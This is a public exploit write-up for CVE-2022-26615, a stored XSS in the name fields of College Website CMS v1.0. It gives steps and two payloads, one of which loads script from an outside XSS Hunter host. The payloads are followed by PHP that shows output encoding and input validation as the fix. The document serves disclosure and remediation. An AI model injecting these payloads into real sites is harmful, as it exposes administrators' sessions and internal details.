CVE-2022-26615: OpenSource/exploit_xss_cwms at main · nsparker1337/OpenSource
A cross-site scripting (XSS) vulnerability in College Website Content Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User Profile Name text fields.
# Exploit Title: College Website - Content Management System v1.0 - Stored (Blind) Cross-Site Scripting (XSS)
# Exploit Author: NS Kumar (n1_x)
# Date: March 4, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cwms.zip
# Tested on: Parrot Linux, Apache, MySQL
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# College Website - Content Management System v1.0 suffers from a stored (blind) XSS injection vulnerability that allows remote attackers to gain admin access and view internal IPs.
# To Exploit:
Step 1: Go to the Profile page.
Step 2: Put an XSS Hunter payload, or any other payload, in either the First Name or the Last Name field.
Step 3: Wait for the admin to view your details, or just reload the page to see the popup appear.
Step 4: The XSS then fires and the alert shows up on the XSS Hunter page.
Payload used for this exploit: "><script src=https://d4.xss.ht></script> or <script>confirm('Testing for XSS')</script>
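The fix for the flaw described above, as an added example that is not code from the CMS or from the exploit author: it contrasts echoing the stored name fields unchanged with encoding them on output, and adds an allow-list check on write. The function names are hypothetical and the sample rows are constructed, reusing the two test strings from the write-up.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: the CMS's own rendering code is not shown on the page.

/** Vulnerable pattern: the stored value is echoed into HTML unchanged. */
function render_name_unsafe(string $first, string $last): string
{
    return '<td class="name">' . $first . ' ' . $last . '</td>';
}

/** Hardened: encode on output in every view, including the admin user list. */
function render_name_safe(string $first, string $last): string
{
    $enc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<td class="name">' . $enc($first) . ' ' . $enc($last) . '</td>';
}

/** Defense in depth on write: letters, marks, space, dot, apostrophe, hyphen. */
function is_valid_name(string $s): bool
{
    return preg_match('/^[\p{L}\p{M}][\p{L}\p{M} .\'-]{0,63}$/u', $s) === 1;
}

// Constructed sample rows: one ordinary name and the two write-up test strings.
$rows = [
    ['Anne-Marie', "O'Neil"],
    ['"><script src=https://d4.xss.ht></script>', 'Kumar'],
    ["<script>confirm('Testing for XSS')</script>", 'Kumar'],
];

foreach ($rows as [$first, $last]) {
    $unsafe = render_name_unsafe($first, $last);
    $safe   = render_name_safe($first, $last);
    printf(
        "valid=%s unsafe_has_script=%s safe_has_script=%s\n  %s\n",
        var_export(is_valid_name($first) && is_valid_name($last), true),
        var_export(stripos($unsafe, '<script') !== false, true),
        var_export(stripos($safe, '<script') !== false, true),
        $safe
    );
}
```

Output encoding is the control that closes the hole; the allow-list only reduces what can be stored, so values already in the database still need the encoded render path.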